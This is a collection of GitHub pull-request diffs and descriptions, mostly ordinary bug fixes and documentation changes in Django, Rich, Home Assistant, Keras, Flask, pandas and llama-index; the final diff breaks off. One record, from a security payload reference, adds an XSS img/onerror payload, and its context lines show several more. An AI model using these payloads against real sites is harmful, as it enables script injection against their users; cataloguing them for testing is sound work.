Fixed #24851 -- Fixed crash with reverse one-to-one relation in ModelAdmin.list_display | diff --git a/django/contrib/admin/templatetags/admin_list.py b/django/contrib/admin/templatetags/admin_list.py
index 55fba4f90ce8b..e602133ca279c 100644
--- a/django/contrib/admin/templatetags/admin_list.py
+++ b/django/contrib/admin/templatetags/admin_list.py
@@ -200,7 +200,7 @@ def link_in_col(is_first, field_name, cl):
except ObjectDoesNotExist:
result_repr = EMPTY_CHANGELIST_VALUE
else:
- if f is None:
+ if f is None or f.auto_created:
if field_name == 'action_checkbox':
row_classes = ['action-checkbox']
allow_tags = getattr(attr, 'allow_tags', False)
diff --git a/django/contrib/admin/views/main.py b/django/contrib/admin/views/main.py
index c0e59f9a5fb2b..68c787871a6d4 100644
--- a/django/contrib/admin/views/main.py
+++ b/django/contrib/admin/views/main.py
@@ -383,7 +383,7 @@ def has_related_field_in_list_display(self):
except FieldDoesNotExist:
pass
else:
- if isinstance(field.rel, models.ManyToOneRel):
+ if hasattr(field, 'rel') and isinstance(field.rel, models.ManyToOneRel):
return True
return False
diff --git a/docs/releases/1.8.3.txt b/docs/releases/1.8.3.txt
index 3bc13a2656016..860191db1b2f3 100644
--- a/docs/releases/1.8.3.txt
+++ b/docs/releases/1.8.3.txt
@@ -28,3 +28,6 @@ Bugfixes
* Prevented the loss of ``null``/``not null`` column properties during field
renaming of MySQL databases (:ticket:`24817`).
+
+* Fixed a crash when using a reverse one-to-one relation in
+ ``ModelAdmin.list_display`` (:ticket:`24851`).
diff --git a/tests/admin_changelist/admin.py b/tests/admin_changelist/admin.py
index 926a45d518607..a31cd84c1ce8b 100644
--- a/tests/admin_changelist/admin.py
+++ b/tests/admin_changelist/admin.py
@@ -102,7 +102,7 @@ class NoListDisplayLinksParentAdmin(admin.ModelAdmin):
class SwallowAdmin(admin.ModelAdmin):
actions = None # prevent ['action_checkbox'] + list(list_display)
- list_display = ('origin', 'load', 'speed')
+ list_display = ('origin', 'load', 'speed', 'swallowonetoone')
site.register(Swallow, SwallowAdmin)
diff --git a/tests/admin_changelist/models.py b/tests/admin_changelist/models.py
index 76249b2cd39d9..c01bf32062180 100644
--- a/tests/admin_changelist/models.py
+++ b/tests/admin_changelist/models.py
@@ -78,6 +78,10 @@ class Meta:
ordering = ('speed', 'load')
+class SwallowOneToOne(models.Model):
+ swallow = models.OneToOneField(Swallow)
+
+
class UnorderedObject(models.Model):
"""
Model without any defined `Meta.ordering`.
diff --git a/tests/admin_changelist/tests.py b/tests/admin_changelist/tests.py
index c69b6712efac8..8d5b966572d85 100644
--- a/tests/admin_changelist/tests.py
+++ b/tests/admin_changelist/tests.py
@@ -25,7 +25,7 @@
from .models import (
Band, Child, ChordsBand, ChordsMusician, CustomIdUser, Event, Genre, Group,
Invitation, Membership, Musician, OrderedObject, Parent, Quartet, Swallow,
- UnorderedObject,
+ SwallowOneToOne, UnorderedObject,
)
@@ -478,8 +478,10 @@ def test_tuple_list_display(self):
Regression test for #17128
(ChangeList failing under Python 2.5 after r16319)
"""
- swallow = Swallow.objects.create(
- origin='Africa', load='12.34', speed='22.2')
+ swallow = Swallow.objects.create(origin='Africa', load='12.34', speed='22.2')
+ swallow2 = Swallow.objects.create(origin='Africa', load='12.34', speed='22.2')
+ swallow_o2o = SwallowOneToOne.objects.create(swallow=swallow2)
+
model_admin = SwallowAdmin(Swallow, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/swallow/', superuser)
@@ -488,6 +490,9 @@ def test_tuple_list_display(self):
self.assertContains(response, six.text_type(swallow.origin))
self.assertContains(response, six.text_type(swallow.load))
self.assertContains(response, six.text_type(swallow.speed))
+ # Reverse one-to-one relations should work.
+ self.assertContains(response, '<td class="field-swallowonetoone">(None)</td>')
+ self.assertContains(response, '<td class="field-swallowonetoone">%s</td>' % swallow_o2o)
def test_deterministic_order_for_unordered_model(self):
"""
| In 1.8, `get_field()` returns reverse relations so we need to filter them out for backwards compatibility.
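
A rough sketch of what that looks like with the test models above (the import path is illustrative, and the exact attribute behaviour is an assumption about Django 1.8 internals implied by the new guards, not documented API):

```python
from admin_changelist.models import Swallow  # test app added in this patch

# In Django 1.8, _meta.get_field() also resolves the reverse side of
# SwallowOneToOne's OneToOneField. That object is an auto-created relation,
# not a regular field, and it has no `rel` attribute -- hence the new
# `f.auto_created` and `hasattr(field, 'rel')` guards in admin_list.py
# and views/main.py.
field = Swallow._meta.get_field('swallowonetoone')
print(field.auto_created)     # expected: True
print(hasattr(field, 'rel'))  # expected: False
```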
| https://api.github.com/repos/django/django/pulls/4717 | 2015-05-27T15:50:19Z | 2015-05-28T14:48:21Z | 2015-05-28T14:48:21Z | 2015-05-28T14:51:15Z | 1,194 | django/django | 51,424 |
Update README.es.md collapsable sections | diff --git a/README.es.md b/README.es.md
index 53faae511..a433067d5 100644
--- a/README.es.md
+++ b/README.es.md
@@ -29,6 +29,12 @@ Instale con `pip` o su administrador de paquetes PyPi favorito.
pip install rich
```
+Ejecute lo siguiente para probar la salida de Rich sobre su terminal:
+
+```
+python -m rich
+```
+
## Función print de Rich
Para agregar sin esfuerzo resultados enriquecidos a su aplicación, puede importar el método [rich print](https://rich.readthedocs.io/en/latest/introduction.html#quick-start), que tiene la misma firma que el método incorporado de Python. Prueba esto:
@@ -88,7 +94,30 @@ console.print("Where there is a [bold cyan]Will[/bold cyan] there [u]is[/u] a [i
![Console Markup](https://github.com/willmcgugan/rich/raw/master/imgs/where_there_is_a_will.png)
-### Registro de consola
+Usted puede usar el objeto Console para generar salida sofisticada con mínimo esfuerzo. Ver la [API Console](https://rich.readthedocs.io/en/latest/console.html) docs para detalles.
+
+## Rich Inspector
+
+Rich tiene ua función [inspeccionar](https://rich.readthedocs.io/en/latest/reference/init.html?highlight=inspect#rich.inspect) cual puede producir un reporte sobre cualquier objeto Python, como clases, instancia o builtin.
+
+```python
+>>> my_list = ["foo", "bar"]
+>>> from rich import inspect
+>>> inspect(my_list, methods=True)
+```
+
+![Log](https://github.com/willmcgugan/rich/raw/master/imgs/inspect.png)
+
+Ver la [docs inspector](https://rich.readthedocs.io/en/latest/reference/init.html#rich.inspect) para detalles.
+
+# Paquete Rich
+
+Rich contiene un número de builtin _renderables_ que puedes usar para crear salida elegante en su CLI y ayudarle a depurar su código.
+
+Haga clic en los siguientes títulos para obtener más detalles:
+
+<details>
+<summary>Registro de consola</summary>
El objeto Console tiene un método `log()` que tiene una interfaz similar a `print()`, pero también muestra una columna para la hora actual y el archivo y la línea que realizó la llamada. De forma predeterminada, Rich resaltará la sintaxis de las estructuras de Python y de las cadenas de reproducción. Si registra una colección (es decir, un diccionario o una lista), Rich la imprimirá de forma bonita para que quepa en el espacio disponible. A continuación, se muestra un ejemplo de algunas de estas funciones.
@@ -123,13 +152,17 @@ Tenga en cuenta el argumento `log_locals`, que genera una tabla que contiene las
El método de registro podría usarse para iniciar sesión en el terminal para aplicaciones de larga ejecución, como servidores, pero también es una ayuda de depuración muy buena.
-### Controlador de registro
+</details>
+<details>
+<summary>Controlador de registro</summary>
También puede usar la [Handler class](https://rich.readthedocs.io/en/latest/logging.html) incorporada para formatear y colorear la salida del módulo de registro de Python. Aquí hay un ejemplo de la salida:
![Registro](https://github.com/willmcgugan/rich/raw/master/imgs/logging.png)
+</details>
-## Emoji
+<details>
+<summary>Emoji</summary>
Para insertar un emoji en la salida de la consola, coloque el nombre entre dos puntos. He aquí un ejemplo:
@@ -139,8 +172,10 @@ Para insertar un emoji en la salida de la consola, coloque el nombre entre dos p
```
Utilice esta función con prudencia.
+</details>
-## Tablas
+<details>
+<summary>Tablas</summary>
Rich puede renderizar [tablas](https://rich.readthedocs.io/en/latest/tables.html) flexibles con caracteres de cuadro Unicode. Existe una gran variedad de opciones de formato para bordes, estilos, alineación de celdas, etc.
@@ -190,7 +225,10 @@ La clase `Table` es lo suficientemente inteligente como para cambiar el tamaño
![table2](https://github.com/willmcgugan/rich/raw/master/imgs/table2.png)
-## Barras de progreso
+</details>
+
+<details>
+<summary>Barras de progreso</summary>
Rich puede representar varias barras de [progreso](https://rich.readthedocs.io/en/latest/progress.html) sin parpadeos para realizar un seguimiento de las tareas de larga duración.
@@ -213,7 +251,10 @@ Las columnas pueden configurarse para mostrar los detalles que desee. Las column
Para probar esto usted mismo, consulte [examples/downloader.py](https://github.com/willmcgugan/rich/blob/master/examples/downloader.py) que puede descargar varias URL simultáneamente mientras muestra el progreso.
-## Estado
+</details>
+
+<details>
+<summary>Estado</summary>
Para situaciones en las que es difícil calcular el progreso, puede utilizar el método [status](https://rich.readthedocs.io/en/latest/reference/console.html#rich.console.Console.status) que mostrará una animación y un mensaje de "spinner". La animación no le impedirá usar la consola con normalidad. He aquí un ejemplo:
@@ -245,7 +286,29 @@ El comando anterior genera la siguiente salida en la terminal:
![spinners](https://github.com/willmcgugan/rich/raw/master/imgs/spinners.gif)
-## Columnas
+</details>
+
+<details>
+<summary>Árbol</summary>
+
+Rich genera un [tree](https://rich.readthedocs.io/en/latest/tree.html) con líneas de guía. Un árbol es ideal para mostrar una estructura de archivos, o cualquier otro dato jerárquico.
+
+Las etiquetas del árbol pueden ser texto simple o cualquier otra cosa que Rich pueda mostar. Ejecuta lo siguiente para una demostración:
+
+```
+python -m rich.tree
+```
+
+Esto genera la siguiente salida:
+
+![markdown](https://github.com/willmcgugan/rich/raw/master/imgs/tree.png)
+
+Ver el ejemplo [tree.py](https://github.com/willmcgugan/rich/blob/master/examples/tree.py) para un script que muestra una vista de árbol de cualquier directorio, similar a el comando de linux `tree`.
+
+</details>
+
+<details>
+<summary>Columnas</summary>
Rich puede representar contenido en [columnas](https://rich.readthedocs.io/en/latest/columns.html) ordenadas con un ancho igual u óptimo. Aquí hay un clon muy básico del comando (MacOS / Linux) `ls` que muestra una lista de directorios en columnas:
@@ -264,7 +327,10 @@ La siguiente captura de pantalla es el resultado del [ejemplo de columnas](https
![columns](https://github.com/willmcgugan/rich/raw/master/imgs/columns.png)
-## Markdown
+</details>
+
+<details>
+<summary>Markdown</summary>
Rich puede renderizar [markdown](https://rich.readthedocs.io/en/latest/markdown.html) y hace un trabajo razonable al traducir el formato al terminal.
@@ -284,7 +350,10 @@ Esto producirá una salida similar a la siguiente:
![markdown](https://github.com/willmcgugan/rich/raw/master/imgs/markdown.png)
-## Resaltado de sintaxis
+</details>
+
+<details>
+<summary>Resaltado de sintaxis</summary>
Rich usa el paquete [pygments](https://pygments.org/) para implementar [resaltado de sintaxis](https://rich.readthedocs.io/en/latest/syntax.html). El uso es similar a renderizar markdown; construya un objeto `Syntax` e imprímalo en la consola. He aquí un ejemplo:
@@ -316,7 +385,10 @@ Esto producirá el siguiente resultado:
![syntax](https://github.com/willmcgugan/rich/raw/master/imgs/syntax.png)
-## Tracebacks
+</details>
+
+<details>
+<summary>Tracebacks</summary>
Rich puede representar [tracebacks hermosos](https://rich.readthedocs.io/en/latest/traceback.html) que son más fáciles de leer y muestran más código que los tracebacks estándar de Python. Puede configurar Rich como el controlador tracebacks predeterminado para que todas las excepciones sin capturar sean procesadas por Rich.
@@ -324,6 +396,8 @@ Así es como se ve en OSX (similar en Linux):
![traceback](https://github.com/willmcgugan/rich/raw/master/imgs/traceback.png)
+</details>
+
## Proyecto usando Rich
Aquí hay algunos proyectos que usan Rich:
| ## Type of changes
- [ ] Bug fix
- [ ] New feature
- [x] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [x] I've run the latest [black](https://github.com/psf/black) with default args on new code.
- [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [x] I accept that @willmcgugan may be pedantic in the code review.
## Description
Update README.es.md, adding collapsible sections and other sections to the Spanish translation. | https://api.github.com/repos/Textualize/rich/pulls/1034 | 2021-02-21T00:21:53Z | 2021-02-21T15:52:39Z | 2021-02-21T15:52:39Z | 2021-02-21T15:52:39Z | 2,080 | Textualize/rich | 47,971 |
Empty traceback frames | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 0fac4a287..1897c96c1 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -16,6 +16,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
- Use `Console(stderr=True)` in `rich.traceback.install` to support io redirection.
- Fixes superfluous spaces in html output https://github.com/Textualize/rich/issues/2832
- Fixed duplicate output in Jupyter https://github.com/Textualize/rich/pulls/2804
+- Fixes traceback failing when a frame filename is unreadable https://github.com/Textualize/rich/issues/2821
### Added
diff --git a/rich/syntax.py b/rich/syntax.py
index d732a2bf0..cc0660c23 100644
--- a/rich/syntax.py
+++ b/rich/syntax.py
@@ -494,7 +494,10 @@ def tokens_to_spans() -> Iterable[Tuple[str, Optional[Style]]]:
# Skip over tokens until line start
while line_no < _line_start:
- _token_type, token = next(tokens)
+ try:
+ _token_type, token = next(tokens)
+ except StopIteration:
+ break
yield (token, None)
if token.endswith("\n"):
line_no += 1
@@ -671,6 +674,8 @@ def _get_syntax(
line_offset = max(0, start_line - 1)
lines: Union[List[Text], Lines] = text.split("\n", allow_blank=ends_on_nl)
if self.line_range:
+ if line_offset > len(lines):
+ return
lines = lines[line_offset:end_line]
if self.indent_guides and not options.ascii_only:
diff --git a/rich/text.py b/rich/text.py
index 9c6bda26b..6c39cfa61 100644
--- a/rich/text.py
+++ b/rich/text.py
@@ -53,11 +53,7 @@ class Span(NamedTuple):
"""Style associated with the span."""
def __repr__(self) -> str:
- return (
- f"Span({self.start}, {self.end}, {self.style!r})"
- if (isinstance(self.style, Style) and self.style._meta)
- else f"Span({self.start}, {self.end}, {self.style!r})"
- )
+ return f"Span({self.start}, {self.end}, {self.style!r})"
def __bool__(self) -> bool:
return self.end > self.start
diff --git a/rich/traceback.py b/rich/traceback.py
index eb0a7a923..341f7f411 100644
--- a/rich/traceback.py
+++ b/rich/traceback.py
@@ -342,6 +342,7 @@ def from_exception(
locals_hide_dunder=locals_hide_dunder,
locals_hide_sunder=locals_hide_sunder,
)
+
return cls(
rich_traceback,
width=width,
@@ -663,7 +664,13 @@ def render_locals(frame: Frame) -> Iterable[ConsoleRenderable]:
style="pygments.text",
)
else:
- text = Text.assemble("in ", (frame.name, "pygments.function"))
+ text = Text.assemble(
+ "in ",
+ (frame.name, "pygments.function"),
+ (":", "pygments.text"),
+ (str(frame.lineno), "pygments.number"),
+ style="pygments.text",
+ )
if not frame.filename.startswith("<") and not first:
yield ""
yield text
@@ -673,6 +680,10 @@ def render_locals(frame: Frame) -> Iterable[ConsoleRenderable]:
if not suppressed:
try:
code = read_code(frame.filename)
+ if not code:
+ # code may be an empty string if the file doesn't exist, OR
+ # if the traceback filename is generated dynamically
+ continue
lexer_name = self._guess_lexer(frame.filename, code)
syntax = Syntax(
code,
| Fixes https://github.com/Textualize/rich/issues/2821 | https://api.github.com/repos/Textualize/rich/pulls/2850 | 2023-03-04T14:29:48Z | 2023-03-04T14:35:32Z | 2023-03-04T14:35:31Z | 2023-03-04T14:35:33Z | 945 | Textualize/rich | 48,295 |
Cleanup camera after late PR review | diff --git a/homeassistant/components/camera/__init__.py b/homeassistant/components/camera/__init__.py
index afc6be481448e8..e5ccb4339753fd 100644
--- a/homeassistant/components/camera/__init__.py
+++ b/homeassistant/components/camera/__init__.py
@@ -893,10 +893,11 @@ async def websocket_update_prefs(
entity_id = changes.pop("entity_id")
try:
entity_prefs = await prefs.async_update(entity_id, **changes)
- connection.send_result(msg["id"], entity_prefs)
except HomeAssistantError as ex:
_LOGGER.error("Error setting camera preferences: %s", ex)
connection.send_error(msg["id"], "update_failed", str(ex))
+ else:
+ connection.send_result(msg["id"], entity_prefs)
async def async_handle_snapshot_service(
diff --git a/homeassistant/components/camera/prefs.py b/homeassistant/components/camera/prefs.py
index effc2f619bd5f6..1107da2ba385ff 100644
--- a/homeassistant/components/camera/prefs.py
+++ b/homeassistant/components/camera/prefs.py
@@ -68,7 +68,8 @@ async def async_update(
) -> dict[str, bool | int]:
"""Update camera preferences.
- Returns a dict with the preferences on success or a string on error.
+ Returns a dict with the preferences on success.
+ Raises HomeAssistantError on failure.
"""
if preload_stream is not UNDEFINED:
# Prefs already initialized.
| ## Proposed change
This PR is a minor cleanup of #77439.
It moves one line out of a try block into an else clause and updates a docstring to describe the new return/raise behavior.
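
For illustration, a generic sketch of the `try`/`except`/`else` shape the websocket handler now follows (plain Python; the callables are placeholders, not Home Assistant APIs):

```python
def handle_update(do_update, send_result, send_error):
    # Only the update itself is guarded: if sending the result fails, that
    # failure propagates instead of being misreported as "update_failed".
    try:
        prefs = do_update()
    except RuntimeError as err:  # stand-in for HomeAssistantError
        send_error("update_failed", str(err))
    else:
        send_result(prefs)

# Trivial placeholder usage:
handle_update(lambda: {"preload_stream": True}, print, print)
```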
## Type of change
- [ ] Dependency upgrade
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Deprecation (breaking change to happen in the future)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [x] Code quality improvements to existing code or addition of tests
## Additional information
- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
- [ ] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] The code has been formatted using Black (`black --fast homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
The integration reached or maintains the following [Integration Quality Scale][quality-scale]:
- [ ] No score or internal
- [ ] 🥈 Silver
- [ ] 🥇 Gold
- [ ] 🏆 Platinum
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
[dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html
[manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html
[quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html
[docs-repository]: https://github.com/home-assistant/home-assistant.io
| https://api.github.com/repos/home-assistant/core/pulls/77880 | 2022-09-06T08:40:46Z | 2022-09-06T10:33:21Z | 2022-09-06T10:33:21Z | 2022-09-07T11:01:58Z | 339 | home-assistant/core | 39,439 |
Update README.md | diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 2bc8e6a0d5..b53044e4a2 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -250,6 +250,7 @@ Most tools are also suitable for blind XSS attacks:
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
+<><img src=1 onerror=alert(1)>
// Svg payload
<svgonload=alert(1)>
| new img payload | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/693 | 2023-11-01T15:32:46Z | 2023-11-12T17:20:39Z | 2023-11-12T17:20:39Z | 2023-11-12T17:20:39Z | 159 | swisskyrepo/PayloadsAllTheThings | 8,405 |
document `Flask.register_blueprint` arguments | diff --git a/flask/app.py b/flask/app.py
index a6e4f18f5d..ece1e2bfdb 100644
--- a/flask/app.py
+++ b/flask/app.py
@@ -995,21 +995,39 @@ def make_null_session(self):
@setupmethod
def register_blueprint(self, blueprint, **options):
- """Registers a blueprint on the application.
+ """Register a :class:`~flask.Blueprint` on the application. Keyword
+ arguments passed to this method will override the defaults set on the
+ blueprint.
+
+ Calls the blueprint's :meth:`~flask.Blueprint.register` method after
+ recording the blueprint in the application's :attr:`blueprints`.
+
+ :param blueprint: The blueprint to register.
+ :param url_prefix: Blueprint routes will be prefixed with this.
+ :param subdomain: Blueprint routes will match on this subdomain.
+ :param url_defaults: Blueprint routes will use these default values for
+ view arguments.
+ :param options: Additional keyword arguments are passed to
+ :class:`~flask.blueprints.BlueprintSetupState`. They can be
+ accessed in :meth:`~flask.Blueprint.record` callbacks.
.. versionadded:: 0.7
"""
first_registration = False
+
if blueprint.name in self.blueprints:
- assert self.blueprints[blueprint.name] is blueprint, \
- 'A blueprint\'s name collision occurred between %r and ' \
- '%r. Both share the same name "%s". Blueprints that ' \
- 'are created on the fly need unique names.' % \
- (blueprint, self.blueprints[blueprint.name], blueprint.name)
+ assert self.blueprints[blueprint.name] is blueprint, (
+ 'A name collision occurred between blueprints %r and %r. Both'
+ ' share the same name "%s". Blueprints that are created on the'
+ ' fly need unique names.' % (
+ blueprint, self.blueprints[blueprint.name], blueprint.name
+ )
+ )
else:
self.blueprints[blueprint.name] = blueprint
self._blueprint_order.append(blueprint)
first_registration = True
+
blueprint.register(self, options, first_registration)
def iter_blueprints(self):
diff --git a/flask/blueprints.py b/flask/blueprints.py
index ed51094e53..80668dbef8 100644
--- a/flask/blueprints.py
+++ b/flask/blueprints.py
@@ -159,18 +159,25 @@ def make_setup_state(self, app, options, first_registration=False):
return BlueprintSetupState(self, app, options, first_registration)
def register(self, app, options, first_registration=False):
- """Called by :meth:`Flask.register_blueprint` to register a blueprint
- on the application. This can be overridden to customize the register
- behavior. Keyword arguments from
- :func:`~flask.Flask.register_blueprint` are directly forwarded to this
- method in the `options` dictionary.
+ """Called by :meth:`Flask.register_blueprint` to register all views
+ and callbacks registered on the blueprint with the application. Creates
+ a :class:`.BlueprintSetupState` and calls each :meth:`record` callback
+ with it.
+
+ :param app: The application this blueprint is being registered with.
+ :param options: Keyword arguments forwarded from
+ :meth:`~Flask.register_blueprint`.
+ :param first_registration: Whether this is the first time this
+ blueprint has been registered on the application.
"""
self._got_registered_once = True
state = self.make_setup_state(app, options, first_registration)
+
if self.has_static_folder:
- state.add_url_rule(self.static_url_path + '/<path:filename>',
- view_func=self.send_static_file,
- endpoint='static')
+ state.add_url_rule(
+ self.static_url_path + '/<path:filename>',
+ view_func=self.send_static_file, endpoint='static'
+ )
for deferred in self.deferred_functions:
deferred(state)
| closes #1809
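A hypothetical usage sketch of the keyword arguments documented above (the app, blueprint name, and route are made up for illustration, not taken from the PR):
```python
from flask import Flask, Blueprint

bp = Blueprint("admin", __name__)

@bp.route("/dashboard")
def dashboard():
    return "admin dashboard"

app = Flask(__name__)
# Keyword arguments override the defaults set on the blueprint and are
# available to record() callbacks via BlueprintSetupState.
app.register_blueprint(bp, url_prefix="/admin")
```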
| https://api.github.com/repos/pallets/flask/pulls/2371 | 2017-06-14T14:18:26Z | 2017-06-14T14:41:44Z | 2017-06-14T14:41:44Z | 2020-11-14T02:42:47Z | 925 | pallets/flask | 20,012 |
Fix predict_generator output shape for multi-output models when batch size is larger than the dataset. | diff --git a/keras/engine/training.py b/keras/engine/training.py
index 2e1ef097433..59e5a474704 100644
--- a/keras/engine/training.py
+++ b/keras/engine/training.py
@@ -2445,6 +2445,6 @@ def predict_generator(self, generator, steps=None,
else:
return np.concatenate(all_outs[0])
if steps_done == 1:
- return [out for out in all_outs]
+ return [out[0] for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
diff --git a/tests/keras/engine/test_training.py b/tests/keras/engine/test_training.py
index 6cda6c4c5f7..376c762da09 100644
--- a/tests/keras/engine/test_training.py
+++ b/tests/keras/engine/test_training.py
@@ -22,11 +22,12 @@
class RandomSequence(Sequence):
- def __init__(self, batch_size):
+ def __init__(self, batch_size, sequence_length=12):
self.batch_size = batch_size
+ self.sequence_length = sequence_length
def __len__(self):
- return 12
+ return self.sequence_length
def __getitem__(self, idx):
return [np.random.random((self.batch_size, 3)), np.random.random((self.batch_size, 3))], [
@@ -410,6 +411,46 @@ def gen_data():
initial_epoch=0, validation_data=gen_data(),
callbacks=[tracker_cb])
+ # predict_generator output shape behavior should be consistent
+ def expected_shape(batch_size, n_batches):
+ return (batch_size * n_batches, 4), (batch_size * n_batches, 3)
+
+ # Multiple outputs and one step.
+ batch_size = 5
+ sequence_length = 1
+ shape_0, shape_1 = expected_shape(batch_size, sequence_length)
+ out = model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out[0]) == shape_0 and np.shape(out[1]) == shape_1
+
+ # Multiple outputs and multiple steps.
+ batch_size = 5
+ sequence_length = 2
+ shape_0, shape_1 = expected_shape(batch_size, sequence_length)
+ out = model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out[0]) == shape_0 and np.shape(out[1]) == shape_1
+
+ # Create a model with a single output.
+ single_output_model = Model([a, b], a_2)
+ single_output_model.compile(optimizer, loss, metrics=[], sample_weight_mode=None)
+
+ # Single output and one step.
+ batch_size = 5
+ sequence_length = 1
+ shape_0, _ = expected_shape(batch_size, sequence_length)
+ out = single_output_model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out) == shape_0
+
+ # Single output and multiple steps.
+ batch_size = 5
+ sequence_length = 2
+ shape_0, _ = expected_shape(batch_size, sequence_length)
+ out = single_output_model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out) == shape_0
+
@pytest.mark.skipif(sys.version_info < (3,), reason='Cannot catch warnings in python 2')
@keras_test
| For a multi-output model, if a data generator's batch size is larger than the data set size, predict_generator's output shape is incorrect.
For example:
* I have a data generator with batch_size=64.
* There are 50 samples in my data set.
* My model is multi-output with 5 outputs containing 3 classes per output.
This scenario will reach [L2448 in training.py](https://github.com/keras-team/keras/blob/master/keras/engine/training.py#L2448):
```
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
```
Because the batch_size is larger than the data set size, steps_done will be equal to 1.
The result will be of shape (5, 1, 50, 3) because `[out for out in all_outs]` doesn't change the output shape. This differs from the case where the batch size is less than the dataset size. In that case the result will be (5, 50, 3) due to `[np.concatenate(out) for out in all_outs]`.
I'm proposing the following fix:
`return [out[0] for out in all_outs]`
This will convert the (5, 1, 50, 3) to the expected (5, 50, 3).
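A rough illustration with hypothetical random arrays matching the shapes described above:
```python
import numpy as np

# 5 outputs, a single batch (steps_done == 1) of 50 samples, 3 classes each.
all_outs = [[np.random.random((50, 3))] for _ in range(5)]

assert np.shape(all_outs) == (5, 1, 50, 3)                    # current behaviour
assert np.shape([out[0] for out in all_outs]) == (5, 50, 3)   # with the proposed fix
```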
*****
Edit: It seems like another solution would be to change
```
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
```
to a single return statement:
```
return [np.concatenate(out) for out in all_outs]
``` | https://api.github.com/repos/keras-team/keras/pulls/8795 | 2017-12-15T03:16:58Z | 2017-12-15T21:32:38Z | 2017-12-15T21:32:38Z | 2017-12-15T21:32:38Z | 813 | keras-team/keras | 47,141 |
Backport PR #32746: DOC: start 1.0.3 | diff --git a/doc/source/whatsnew/index.rst b/doc/source/whatsnew/index.rst
index 76d13478612ee..6764fbd736d46 100644
--- a/doc/source/whatsnew/index.rst
+++ b/doc/source/whatsnew/index.rst
@@ -16,9 +16,10 @@ Version 1.0
.. toctree::
:maxdepth: 2
- v1.0.0
- v1.0.1
+ v1.0.3
v1.0.2
+ v1.0.1
+ v1.0.0
Version 0.25
------------
diff --git a/doc/source/whatsnew/v1.0.2.rst b/doc/source/whatsnew/v1.0.2.rst
index d3921271264c2..cfa3ee6acc29d 100644
--- a/doc/source/whatsnew/v1.0.2.rst
+++ b/doc/source/whatsnew/v1.0.2.rst
@@ -123,4 +123,4 @@ Bug fixes
Contributors
~~~~~~~~~~~~
-.. contributors:: v1.0.1..v1.0.2|HEAD
+.. contributors:: v1.0.1..v1.0.2
diff --git a/doc/source/whatsnew/v1.0.3.rst b/doc/source/whatsnew/v1.0.3.rst
new file mode 100644
index 0000000000000..17f1bdc365518
--- /dev/null
+++ b/doc/source/whatsnew/v1.0.3.rst
@@ -0,0 +1,27 @@
+
+.. _whatsnew_103:
+
+What's new in 1.0.3 (March ??, 2020)
+------------------------------------
+
+These are the changes in pandas 1.0.3. See :ref:`release` for a full changelog
+including other versions of pandas.
+
+{{ header }}
+
+.. ---------------------------------------------------------------------------
+
+.. _whatsnew_103.regressions:
+
+Fixed regressions
+~~~~~~~~~~~~~~~~~
+
+.. _whatsnew_103.bug_fixes:
+
+Bug fixes
+~~~~~~~~~
+
+Contributors
+~~~~~~~~~~~~
+
+.. contributors:: v1.0.2..v1.0.3|HEAD
| https://github.com/pandas-dev/pandas/pull/32746 | https://api.github.com/repos/pandas-dev/pandas/pulls/32750 | 2020-03-16T13:23:59Z | 2020-03-16T14:34:52Z | 2020-03-16T14:34:52Z | 2020-03-16T14:34:53Z | 545 | pandas-dev/pandas | 45,152 |
update toml for code hierarchy | diff --git a/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml b/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml
index b5928b7070f4d..b4c268d598432 100644
--- a/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml
+++ b/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml
@@ -8,10 +8,12 @@ check-hidden = true
skip = "*.csv,*.html,*.json,*.jsonl,*.pdf,*.txt,*.ipynb"
[tool.llamahub]
-classes = ["CodeHierarchyPack"]
-contains_example = true
+contains_example = false
